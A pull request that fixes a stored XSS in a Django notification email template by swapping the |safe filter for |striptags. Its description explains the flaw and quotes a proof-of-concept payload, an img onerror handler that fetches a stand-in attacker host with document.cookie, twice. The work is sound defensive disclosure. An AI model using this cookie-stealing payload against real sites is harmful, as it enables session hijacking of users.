### PR TITLE
fix(security): stop rendering raw comment HTML unescaped in email notifications

### DIFF
--- a/apps/api/templates/emails/notifications/issue-updates.html
+++ b/apps/api/templates/emails/notifications/issue-updates.html
@@ -210,7 +210,7 @@
                     <tr>
                       <td>
                         <div style=" padding: 6px 10px; margin-left: 10px; background-color: white; font-size: 0.8rem; color: #525252; margin-top: 5px; border-radius: 4px; overflow-x: scroll; max-width: 430px;" >
-                          <p> {{ actor_comment|safe }} </p>
+                          <p> {{ actor_comment|striptags }} </p>
                         </div>
                       </td>
                     </tr>


### PR DESCRIPTION
## Summary

Fixes the stored XSS reported in #9218 (CVE-candidate, CWE-79, reported 2026-06-05 with a working PoC, still open at time of this PR).

`issue-updates.html` renders each comment's content with `{{ actor_comment|safe }}`. `|safe` disables Django's autoescaping entirely, and `actor_comment` is sourced from `comment.comment_html` — raw, unsanitized rich-text input from the comment author. A comment body like `<img src=x onerror="fetch('https://attacker.example/log?c='+document.cookie)">` gets written straight into the issue-update notification email as executable HTML, and would run in any email client that renders inline HTML/JS when a project member views the notification.

I traced whether either the "comment" or "mention" code path in `email_notification_task.py` sanitizes content before it reaches the template — it doesn't. `process_mention()`/`process_html_content()` only resolve `<mention-component>` placeholders into plain `@username` text via BeautifulSoup; they aren't a sanitizer, and regular comments (as opposed to mentions) don't even go through that function. `|safe` is the only thing standing between raw comment HTML and the rendered email, and it does the opposite of what's needed here.

## Fix

Switched `|safe` → `|striptags` — one of the three remediation options the original report explicitly proposed. `striptags` (Django's built-in filter, no new dependency) removes every HTML tag *and its attributes* entirely, so an `onerror` handler never survives into the output, and any leftover text still goes through Django's normal autoescaping.

Verified directly against Django (not just by inspection):

```python
payload = '<img src=x onerror="fetch(\'http://attacker.com/log?c=\'+document.cookie)">'
Template('{{ actor_comment|safe }}').render(Context({'actor_comment': payload}))
# → '<img src=x onerror="fetch(\'http://attacker.com/log?c=\'+document.cookie)">'   (executes)
Template('{{ actor_comment|striptags }}').render(Context({'actor_comment': payload}))
# → ''   (nothing left to execute)
```

Also checked a mixed case (`<p>Great point! <script>alert(1)</script>Thanks</p>`) — `striptags` renders it as the inert text `Great point! alert(1)Thanks`, not as running script.

This is the only `|safe` usage across `apps/api/templates/`, and there's no plain-text sibling template for this notification, so this is the complete fix for the reported vector.

## Trade-off, flagged deliberately

Comments will now render as plain text in this email instead of keeping bold/italic/link formatting from the rich text editor. That's a conservative choice on purpose — a proper allowlist sanitizer (e.g. `bleach`) could preserve safe formatting while still stripping dangerous tags/attributes, but that needs a new dependency and an allowed-tags policy that actually matches what the editor emits, which isn't something to guess at in a security-sensitive change. Happy to follow up with that if it's wanted; wanted to get the hole closed with something unambiguously correct first.

## Test plan

- [x] Reproduced both the vulnerable and fixed rendering directly against Django's template engine (see above) using the exact PoC payload from #9218.
- [x] Confirmed via `grep` that this is the only `|safe` filter usage in `apps/api/templates/`.
- [ ] Not run against the full test suite or a live SMTP-configured instance in this environment — please run the existing notification tests and confirm the email still renders sensibly before merging.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Issue-update email notifications now display comment text without HTML tags, improving readability and preventing unintended formatting.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->